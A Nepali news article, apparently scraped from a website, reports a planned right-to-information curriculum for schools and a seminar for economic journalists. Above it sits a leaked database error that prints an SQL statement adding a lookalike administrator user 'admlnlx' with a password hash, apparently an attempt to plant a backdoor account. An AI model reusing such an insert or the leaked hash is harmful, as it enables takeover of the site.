WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BggGnu3aKgdBV0yqkf1m/PmnTVhhN4/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 17:05:48', '', 'admlnlx', 'admlnlx')
काठमाडौँ, पुस १३–
सरकारले आगामी शैक्षिक सत्रदेखि सूचनाको हकसम्बन्धी नयाँ पाठ्यक्रम पढाइने भएको छ ।
राष्ट्रिय सूचना आयोगको पहलमा तयार गरिएको पाठ्यक्रमसहित ऐेच्छिक विषयका रुपमा आगामी शैक्षिक सत्रदेखि मुलुकभर कक्षा ६देखि उक्त पाठ्यक्रम पढाउन लागिएको हो ।
आयोगका आयुक्त यशोदा तिमिन्सिनाका अनुसार अगामी शैक्षिक सत्रदेखि पढाई हुने सूचनाको हक विषय पढ्ने विद्यार्थीलाई छात्रवृद्धि दिने तयारी आयोगले गरेको छ ।
सामुदायिक रेडियो प्रसारक सङ्घ (एकोर्याव)ले आयोजना गरेको गोष्ठीमा उहाँले सबैलाई सूचनाको पहुँच भएपछि नागरिक आर्थिक तथा अन्य तवरले सबल हुने बताउँदै त्यसका लागि सरकारले ध्यान दिनुपर्ने बताउनुभयो ।
गोष्ठीमा नागरिक राष्ट्रिय दैनिकका सम्पादक गुणराज लुईंटेलले सार्वजनिक वित्तका विषयका सकारात्मक समाचारलाई प्राथमिकता दिँदा समाजको सशक्तीकरणमा ध्यान दिनुपर्ने बताउनुभयो ।
अर्थशास्त्री गोपाल तिवारीले वित्तीय अनुशासनलाई कायम राख्दै आर्थिक विकासमा लाग्नुपर्नेमा जोड दिँदै त्यसका लागि सञ्चार माध्यमको समाचार कक्षलाई सबल बनाउनुपर्नेमा जोड दिनुभयो ।
एकोर्यावका कार्यकारी निर्देशक डा आरसी लामिछाने पत्रकारले उठाएका विषयले आर्थिक एवम् सामाजिक विकासमा सहयोग पुग्ने भएकाले पत्रकारलाई सक्षम बनाउनुपर्ने बताउनुभयो ।
आज सम्पन्न गोष्ठीमा ३० जनाभन्दा बढी आर्थिक एवम् सामाजिक क्षेत्रमा समाचार लेख्दै आएका पत्रकारको सहभागीता थियो ।